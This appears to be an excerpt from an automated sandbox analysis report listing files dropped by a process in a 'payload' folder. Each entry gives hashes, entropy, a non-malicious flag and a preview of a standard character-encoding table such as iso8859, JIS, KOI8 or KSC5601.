                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-16, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040105014120AC201E016000A7016100A9021800AB017900AD017A017B..00B000B1010C0142017D201D00B600B7017E010D021900BB015201530178017C..00C000C100C2010200C4010600C600C700C800C900CA00CB00CC00CD00CE00CF..0110014300D200D300D4015000D6015A017000D900DA00DB00DC0118021A00DF..00E000E100E201030
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.340505173539446
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:UHVBUlJvRj7SOVbusZhAMiZyi77qim/ssm5VO6ys2K:UMlBVnrAMiwMmT/ssYTys2K
                                                                                                                                                                                                                                            MD5:9B87850646FFE79F3C8001CBCB5BB3A1
                                                                                                                                                                                                                                            SHA1:8F97576F3FB3B5DBEF71DC2C9314AB5E530974D6
                                                                                                                                                                                                                                            SHA-256:76949B03F57041B07F41902BD7505AB3594D79AA8F7BDEED5F0481004B10CBC3
                                                                                                                                                                                                                                            SHA-512:101A28AF0799E7E0A5723E5DD76D5EF0FEEF584AC479A88F499CB3B7D2AA93767D72F8E51C76F7547F08FF8DD3CBBA7FF444BD07F99A92755526E75C596109EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-2, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010402D8014100A4013D015A00A700A80160015E0164017900AD017D017B..00B0010502DB014200B4013E015B02C700B80161015F0165017A02DD017E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.2507537230559977
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:tHVBUlJvRj7SOVbusZhAMiZyi77qimw2g0kgTJMkFtoD:tMlBVnrAMiwMmTo0kgTJDoD
                                                                                                                                                                                                                                            MD5:CBD0B9CDCD9BC3D5F2429A760CF98D2F
                                                                                                                                                                                                                                            SHA1:6DEF0343E0357E0671002A5D2F0BFC2E00C8BCF9
                                                                                                                                                                                                                                            SHA-256:1F51E7BDA64D466C16FEE9A120BBE3353A10CEB9DAB119FFA326779BA78D8C5D
                                                                                                                                                                                                                                            SHA-512:88DB6D23B53F4A78133C794ED42FA3F29A4ABAD35DE4B022040FA187AA59B00664CC13F47AFF4507D72F4CB2166F026144213EE760AB0FD67CDD2FA5906F434A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-3, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0012602D800A300A40000012400A700A80130015E011E013400AD0000017B..00B0012700B200B300B400B5012500B700B80131015F011F013500BD0000017C..00C000C100C2000000C4010A010800C700C800C900CA00CB00CC00CD00CE00CF..000000D100D200D300D4012000D600D7011C00D900DA00DB00DC016C015C00DF..00E000E100E2000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.3413832766873073
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KHVBUlJvRj7SOVbusZhAMiZyi77qimX4AsD/njR7Ky8hA:KMlBVnrAMiwMmTXBs3EyuA
                                                                                                                                                                                                                                            MD5:8B620EDECAC2DF15A024C2CE15FB64A5
                                                                                                                                                                                                                                            SHA1:65C5EE5D08964E37393E6A78ABA0DB16D51240E2
                                                                                                                                                                                                                                            SHA-256:66B3CF994F0B5E0103D13E812958320AFB555C91E3F81B579D4CBF231E6A0805
                                                                                                                                                                                                                                            SHA-512:93391325405D3AEA0A913F5EA8EA0391920D10F234C26AB1DA70992702889A3AF7B85E11A1FCA554690942B238CE313DD460798E59C5B1F4069036E7B0F24F44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-4, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040138015600A40128013B00A700A8016001120122016600AD017D00AF..00B0010502DB015700B40129013C02C700B80161011301230167014A017E014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE012A..01100145014C013600D400D500D600D700D8017200DA00DB00DC0168016A00DF..010100E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.342721205983665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:zHVBUlJvRj7SOVbusZhAMiZyi77qimq5+SAJlz9aRme3cJbx:zMlBVnrAMiwMmTqeYnsJbx
                                                                                                                                                                                                                                            MD5:6FBEFDC3DEC612B7B2CC903D8C53F45B
                                                                                                                                                                                                                                            SHA1:14EC3C166DC411149C32C262DBE8E327F6186669
                                                                                                                                                                                                                                            SHA-256:3130BF26DA0C840C1E02203A90C3B1C38966FB203130E2FBB3DD7CB3865A3539
                                                                                                                                                                                                                                            SHA-512:F3F15AD8B6C9D9B4C9C994FE3235B4463E59BE7DCE79CF3F7AA77905D6F4DC2C4AABB79B440767DB13D357B13F09EA34983FCA7BC92D0AFA15FB6CBEDDD04E38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-5, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0040104020403040404050406040704080409040A040B040C00AD040E040F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..044004410442044304
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):2.992219341429816
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:YHVBUlJvRj7SOVbusZhAMiZyi77qimEZjyG/KE:YMlBVnrAMiwMmTEs6KE
                                                                                                                                                                                                                                            MD5:52F025D943A45EE840D9C3DFD06E4D79
                                                                                                                                                                                                                                            SHA1:571EA14B49FA6150BFD2ABA79E52799955D9FA10
                                                                                                                                                                                                                                            SHA-256:CB71909BF01A3A7A4C7396359DA06D206B58A42AD68192CE37169D6640D46E13
                                                                                                                                                                                                                                            SHA-512:77FF9DC785A63CA59A7D58BB25C7D2C16F364E525F9B939177385EF80F7DE37734C8774F1BC829CF0270FD66257A4D31689654C8037DB0A86A0291FFDE637B90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-6, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000000000000000A40000000000000000000000000000060C00AD00000000..00000000000000000000000000000000000000000000061B000000000000061F..0000062106220623062406250626062706280629062A062B062C062D062E062F..0630063106320633063406350636063706380639063A00000000000000000000..064006410642064306
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.393893260854861
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TMyHVBUlJvRj7SOVbusZhAMiZyi77qim2OBHK9QQSqiWeIDDdn:TlMlBVnrAMiwMmT1hKyQSqiWeIVn
                                                                                                                                                                                                                                            MD5:4BFB0A35D971A9D4C5EA8D8099E93C37
                                                                                                                                                                                                                                            SHA1:8FED2CBB1343E5B4442748242B5F89A76110592D
                                                                                                                                                                                                                                            SHA-256:76F6BC85FC9CB89BC3F94D36275AB23C740BA17FD36EC8907479DA3A885415EA
                                                                                                                                                                                                                                            SHA-512:C9CE1E9EA57A1DEF62BBC60A115C06325C6EE8F92021695459E1ADAF1193A559BC5F0229191BFC2E344296DC137583ED4A9A61A65890F99F4CF97B3864C7AF0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-7, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A02018201900A320AC20AF00A600A700A800A9037A00AB00AC00AD00002015..00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.0494739426493567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:uHVBUlJvRj7SOVbusZhAMiZyi77qimieGlnvs26Kcv:uMlBVnrAMiwMmTirv87
                                                                                                                                                                                                                                            MD5:5F69EAF54E7A1E8AC81C9E734DBE90D8
                                                                                                                                                                                                                                            SHA1:BA509C88A4FC03922EF5CDC887FAA7B594A9BC5A
                                                                                                                                                                                                                                            SHA-256:865E3665743B5FABA3E1AD6AA55515A666BD05DA6266879D9B66C98905DAFF3C
                                                                                                                                                                                                                                            SHA-512:D9924FBE59CB571AF721CA602DBE58CAD0D9310610EDF544F8FC0FBF3D1CE4E99597D0198E4E7C802107012786346FE4C1B9C6C3A76D5F60B9A83981B0EDA24D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-8, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000002017..05D005D105D205D305
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.2591070910715714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkBSMH+tA/b:XMlBVnrAMiwMmTmokgzAD
                                                                                                                                                                                                                                            MD5:0B99E605E73B7D8DEFD8D643F5729748
                                                                                                                                                                                                                                            SHA1:F30E7CCBCD9C539126E8D6CA0886E4B2BD54E05D
                                                                                                                                                                                                                                            SHA-256:CF51E867DDE2F19553D98FEEC45A075C4B4F480FB1EDADB3D8DAD1EBEA9299F3
                                                                                                                                                                                                                                            SHA-512:DA0487CD7F2143195E80697C17FFDB61AFD464C888DDF84813B2B5D1BAB24D96466DA7A7F77C8E4A9D0D53F34D72928923380AFC1B92A96C0A3BFF46006A4E19
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-9, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.2708615484795676
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:zBHVBUlJvRj7SOVbusZhAMiZyi77qN8VmKfkiJt0RMFS:zBMlBVnrAMiwMmNPYPFS
                                                                                                                                                                                                                                            MD5:4E21F24F8D9CC5DF16B29CACD997AC69
                                                                                                                                                                                                                                            SHA1:064E723EFB82EF1C303E5267496304288821E404
                                                                                                                                                                                                                                            SHA-256:61B14A7C312366F79BB45F02C6B7EE362E6F51CBAD5E479E563C7F7E785DB654
                                                                                                                                                                                                                                            SHA-512:AF8FAEB47EFB51F2537139F7C4254ABED119E477FD2B5E83B90B7A903B43C4E02DDF43A7DDB044A0A9601E9F9ADE91B02EE7C0EC87FF5DDCF9951B9601A90435
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0201, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..00000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81772
                                                                                                                                                                                                                                            Entropy (8bit):2.3571626869060776
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:AigXM6CwL/9pV7Hl6+Yko9gZxErA3/MS/8xqg8:AZ/tp1Hl2KZxUfr8
                                                                                                                                                                                                                                            MD5:F0661E22C7455994AA1F6EC1EDA401B4
                                                                                                                                                                                                                                            SHA1:928B2AC46A9FDE61A81F56BE225E6138B40C22E5
                                                                                                                                                                                                                                            SHA-256:F6B1C6AC5F5FC4E990A7A1AAC16A406012040936431BEFE7D2B6CD1DA9E422C4
                                                                                                                                                                                                                                            SHA-512:917CC58678A9E9F5CBE860D30828846ABA4EA8CDFAB7DD1AE6A66C47ECBB85CF67DD97BC3E6F95341DD30F4E757B2CEA571708D5B4CED18A29F19904C3138AE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0208, double-byte..D..2129 0 77..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8..FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F..FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D..FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7..00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5..FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):72133
                                                                                                                                                                                                                                            Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                                            MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                                            SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                                            SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                                            SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                                            MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                                            SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                                            SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                                            SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                                            MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                                            SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                                            SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                                            SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94393
                                                                                                                                                                                                                                            Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                                            MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                                            SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                                            SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                                            SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                                            Encrypted:false
